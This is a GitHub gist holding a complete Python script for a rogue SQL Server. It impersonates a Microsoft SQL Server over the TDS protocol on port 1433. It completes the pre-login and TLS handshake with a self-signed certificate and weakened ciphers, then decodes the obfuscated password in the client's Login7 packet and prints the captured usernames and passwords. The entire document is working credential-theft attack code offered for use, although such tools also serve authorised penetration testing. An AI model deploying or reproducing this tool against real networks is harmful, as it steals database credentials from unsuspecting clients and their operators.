Created
February 16, 2026 23:01
-
-
Save jimmy-ly00/c1d757b787fae5b6f5e74cc621b72c0d to your computer and use it in GitHub Desktop.
Rogue TDS SQL Server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Rogue TDS/SQL Server - Captures SQL credentials from Login7 packets. | |
| Implements the TDS pre-login handshake and TLS negotiation so the client | |
| proceeds to send Login7 with credentials. | |
| Requires: pip install cryptography | |
| """ | |
| import socket | |
| import struct | |
| import ssl | |
| import tempfile | |
| import os | |
| import sys | |
| TDS_PRELOGIN = 0x12 | |
| TDS_LOGIN7 = 0x10 | |
| # Certificate Generation | |
| def generate_cert(): | |
| """Generate a self-signed cert for the TLS handshake.""" | |
| try: | |
| from cryptography import x509 | |
| from cryptography.x509.oid import NameOID | |
| from cryptography.hazmat.primitives import hashes, serialization | |
| from cryptography.hazmat.primitives.asymmetric import rsa | |
| from datetime import datetime, timedelta | |
| except ImportError: | |
| print("[!] Install cryptography: pip install cryptography") | |
| sys.exit(1) | |
| cert_path = os.path.join(tempfile.gettempdir(), "rogue_sql.crt") | |
| key_path = os.path.join(tempfile.gettempdir(), "rogue_sql.key") | |
| if os.path.exists(cert_path) and os.path.exists(key_path): | |
| return cert_path, key_path | |
| key = rsa.generate_private_key(public_exponent=65537, key_size=2048) | |
| subject = issuer = x509.Name([ | |
| x509.NameAttribute(NameOID.COMMON_NAME, "SQLServer"), | |
| ]) | |
| cert = ( | |
| x509.CertificateBuilder() | |
| .subject_name(subject) | |
| .issuer_name(issuer) | |
| .public_key(key.public_key()) | |
| .serial_number(x509.random_serial_number()) | |
| .not_valid_before(datetime.utcnow()) | |
| .not_valid_after(datetime.utcnow() + timedelta(days=365)) | |
| .sign(key, hashes.SHA256()) | |
| ) | |
| with open(cert_path, "wb") as f: | |
| f.write(cert.public_bytes(serialization.Encoding.PEM)) | |
| with open(key_path, "wb") as f: | |
| f.write(key.private_bytes( | |
| serialization.Encoding.PEM, | |
| serialization.PrivateFormat.TraditionalOpenSSL, | |
| serialization.NoEncryption(), | |
| )) | |
| print(f"[*] Generated cert: {cert_path}") | |
| print(f"[*] Generated key: {key_path}") | |
| return cert_path, key_path | |
| # low-level helpers | |
| def recv_exact(sock, n): | |
| """Receive exactly n bytes or return None.""" | |
| buf = b"" | |
| while len(buf) < n: | |
| chunk = sock.recv(n - len(buf)) | |
| if not chunk: | |
| return None | |
| buf += chunk | |
| return buf | |
| def read_tds_packet(sock): | |
| """Read one TDS packet. Returns (type, status, payload) or Nones.""" | |
| hdr = recv_exact(sock, 8) | |
| if not hdr: | |
| return None, None, None | |
| pkt_type = hdr[0] | |
| status = hdr[1] | |
| length = struct.unpack(">H", hdr[2:4])[0] | |
| payload = recv_exact(sock, length - 8) | |
| return pkt_type, status, payload | |
| def build_tds_packet(pkt_type, payload, status=0x01, pkt_id=1): | |
| """Wrap payload in a TDS header.""" | |
| length = len(payload) + 8 | |
| hdr = struct.pack("!BBHHBB", pkt_type, status, length, 0, pkt_id, 0) | |
| return hdr + payload | |
| # Pre-Login | |
| def build_prelogin_response(): | |
| """ | |
| Build TDS Pre-Login response payload. | |
| Sets ENCRYPTION = 0x01 (ENCRYPT_ON) so the client will proceed | |
| with a TLS handshake and then send Login7 inside TLS. | |
| """ | |
| # 5 option tokens (5 bytes each) + 0xFF terminator = 26 bytes | |
| version_data = b"\x0f\x00\x07\xd0\x00\x00" # 15.0.2000 (SQL 2019) | |
| encrypt_data = b"\x01" # ENCRYPT_ON | |
| instopt_data = b"\x00" | |
| threadid_data = b"\x00\x00\x00\x00" | |
| mars_data = b"\x00" | |
| data_items = [ | |
| (0x00, version_data), | |
| (0x01, encrypt_data), | |
| (0x02, instopt_data), | |
| (0x03, threadid_data), | |
| (0x04, mars_data), | |
| ] | |
| options_size = len(data_items) * 5 + 1 # 26 | |
| tokens = b"" | |
| offset = options_size | |
| for token_id, value in data_items: | |
| tokens += struct.pack("!BHH", token_id, offset, len(value)) | |
| offset += len(value) | |
| tokens += b"\xff" | |
| return tokens + version_data + encrypt_data + instopt_data + threadid_data + mars_data | |
| # TLS handshake (TDS-wrapped) | |
| def tds_tls_handshake(conn, ssl_ctx): | |
| """ | |
| Perform a TLS handshake where TLS records are wrapped inside | |
| TDS PRELOGIN (0x12) packets, as required by the TDS protocol. | |
| Returns (tls_object, incoming_bio, outgoing_bio). | |
| After this, raw TLS records flow directly on the TCP socket | |
| (no more TDS wrapping), and inside the TLS stream regular | |
| TDS packets are sent. | |
| """ | |
| incoming = ssl.MemoryBIO() | |
| outgoing = ssl.MemoryBIO() | |
| tls = ssl_ctx.wrap_bio(incoming, outgoing, server_side=True) | |
| while True: | |
| try: | |
| tls.do_handshake() | |
| # Flush any remaining TLS data | |
| out = outgoing.read() | |
| if out: | |
| conn.sendall(build_tds_packet(TDS_PRELOGIN, out)) | |
| return tls, incoming, outgoing | |
| except ssl.SSLWantReadError: | |
| # Send whatever TLS produced so far (wrapped in TDS) | |
| out = outgoing.read() | |
| if out: | |
| conn.sendall(build_tds_packet(TDS_PRELOGIN, out)) | |
| # Read the next TDS packet from the client | |
| pkt_type, status, data = read_tds_packet(conn) | |
| if data is None: | |
| raise ConnectionError("Client disconnected during TLS handshake") | |
| # Feed the TLS payload into the incoming BIO | |
| incoming.write(data) | |
| # Reading TDS-over-TLS | |
| def tls_recv(conn, tls_obj, in_bio, n): | |
| """ | |
| Read exactly n decrypted bytes from the TLS stream. | |
| Feeds raw data from the socket into the BIO as needed. | |
| """ | |
| buf = b"" | |
| while len(buf) < n: | |
| try: | |
| chunk = tls_obj.read(n - len(buf)) | |
| if chunk: | |
| buf += chunk | |
| except ssl.SSLWantReadError: | |
| raw = conn.recv(16384) | |
| if not raw: | |
| return buf | |
| in_bio.write(raw) | |
| return buf | |
| def read_tds_over_tls(conn, tls_obj, in_bio): | |
| """Read one TDS packet from inside the TLS stream.""" | |
| hdr = tls_recv(conn, tls_obj, in_bio, 8) | |
| if not hdr or len(hdr) < 8: | |
| return None, None, None | |
| pkt_type = hdr[0] | |
| status = hdr[1] | |
| length = struct.unpack(">H", hdr[2:4])[0] | |
| payload = tls_recv(conn, tls_obj, in_bio, length - 8) | |
| return pkt_type, status, payload | |
| # Login7 parsing | |
| def decode_password(raw_bytes): | |
| """ | |
| Decode the obfuscated password from a Login7 packet. | |
| TDS encoding: for each byte, swap nibbles then XOR 0xA5. | |
| Decoding: XOR 0xA5 then swap nibbles. | |
| """ | |
| out = bytearray(len(raw_bytes)) | |
| for i, b in enumerate(raw_bytes): | |
| b ^= 0xA5 | |
| b = ((b >> 4) & 0x0F) | ((b & 0x0F) << 4) | |
| out[i] = b | |
| return out.decode("utf-16-le", errors="replace") | |
| def parse_login7(data): | |
| """Extract fields (username, password, etc.) from Login7 payload.""" | |
| if len(data) < 94: | |
| return {} | |
| field_defs = [ | |
| ("HostName", 36), | |
| ("UserName", 40), | |
| ("Password", 44), | |
| ("AppName", 48), | |
| ("ServerName", 52), | |
| ("_unused", 56), | |
| ("InterfaceName", 60), | |
| ("Language", 64), | |
| ("Database", 68), | |
| ] | |
| fields = {} | |
| for name, base in field_defs: | |
| if name.startswith("_") or base + 4 > len(data): | |
| continue | |
| ib = struct.unpack("<H", data[base:base + 2])[0] # byte offset | |
| cch = struct.unpack("<H", data[base + 2:base + 4])[0] # char count | |
| if cch == 0: | |
| fields[name] = "" | |
| continue | |
| end = ib + cch * 2 | |
| if end > len(data): | |
| continue | |
| raw = data[ib:end] | |
| fields[name] = decode_password(raw) if name == "Password" else raw.decode("utf-16-le", errors="replace") | |
| return fields | |
| # Main server loop | |
| def main(): | |
| host = "0.0.0.0" | |
| port = 1433 | |
| cert_path, key_path = generate_cert() | |
| ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) | |
| ssl_ctx.load_cert_chain(cert_path, key_path) | |
| try: | |
| ssl_ctx.minimum_version = ssl.TLSVersion.TLSv1 | |
| except (AttributeError, ValueError): | |
| pass # Older Python or restricted build | |
| try: | |
| ssl_ctx.set_ciphers("DEFAULT:@SECLEVEL=0") | |
| except ssl.SSLError: | |
| ssl_ctx.set_ciphers("DEFAULT") | |
| srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) | |
| srv.bind((host, port)) | |
| srv.listen(5) | |
| print(f"[*] Rogue SQL Server listening on {host}:{port}") | |
| print(f"[*] Waiting for connections …\n") | |
| count = 0 | |
| while True: | |
| conn, addr = srv.accept() | |
| count += 1 | |
| print(f"{'=' * 60}") | |
| print(f"[+] Connection #{count} from {addr[0]}:{addr[1]}") | |
| print(f"{'=' * 60}") | |
| try: | |
| # Step 1: Pre-Login | |
| pkt_type, _, payload = read_tds_packet(conn) | |
| if pkt_type != TDS_PRELOGIN: | |
| print(f"[-] Expected Pre-Login (0x12), got 0x{pkt_type:02x}") | |
| continue | |
| print(f"[*] Received Pre-Login ({len(payload)} bytes)") | |
| # Parse client encryption preference | |
| if payload: | |
| # Find ENCRYPTION option (token 0x01) | |
| i = 0 | |
| while i < len(payload) and payload[i] != 0xFF: | |
| token = payload[i] | |
| off = struct.unpack(">H", payload[i+1:i+3])[0] | |
| ln = struct.unpack(">H", payload[i+3:i+5])[0] | |
| if token == 0x01 and ln == 1 and off < len(payload): | |
| enc_names = {0: "OFF", 1: "ON", 2: "NOT_SUP", 3: "REQ"} | |
| enc_val = payload[off] | |
| print(f"[*] Client encryption: ENCRYPT_{enc_names.get(enc_val, '?')} (0x{enc_val:02x})") | |
| i += 5 | |
| # Step 2: Pre-Login Response | |
| resp = build_prelogin_response() | |
| conn.sendall(build_tds_packet(TDS_PRELOGIN, resp)) | |
| print(f"[*] Sent Pre-Login response (ENCRYPT_ON)") | |
| # Step 3: TLS Handshake | |
| print(f"[*] Starting TLS handshake …") | |
| tls, in_bio, out_bio = tds_tls_handshake(conn, ssl_ctx) | |
| print(f"[*] TLS handshake complete ({tls.version()})") | |
| # Step 4: Read Login7 inside TLS | |
| pkt_type, _, l7_data = read_tds_over_tls(conn, tls, in_bio) | |
| if pkt_type is None: | |
| print(f"[-] No data after TLS handshake") | |
| continue | |
| print(f"[*] Received TDS packet type 0x{pkt_type:02x} ({len(l7_data)} bytes)") | |
| if pkt_type == TDS_LOGIN7: | |
| creds = parse_login7(l7_data) | |
| print() | |
| print(f"{'*' * 60}") | |
| print(f" CAPTURED CREDENTIALS") | |
| print(f"{'*' * 60}") | |
| for k, v in creds.items(): | |
| print(f" {k:16s}: {v}") | |
| print(f"{'*' * 60}") | |
| print() | |
| else: | |
| print(f"[-] Expected Login7 (0x10), got 0x{pkt_type:02x}") | |
| print(f" Hex preview: {l7_data[:80].hex()}") | |
| except Exception as ex: | |
| print(f"[-] Error: {ex}") | |
| import traceback | |
| traceback.print_exc() | |
| finally: | |
| try: | |
| conn.close() | |
| except Exception: | |
| pass | |
| print() | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment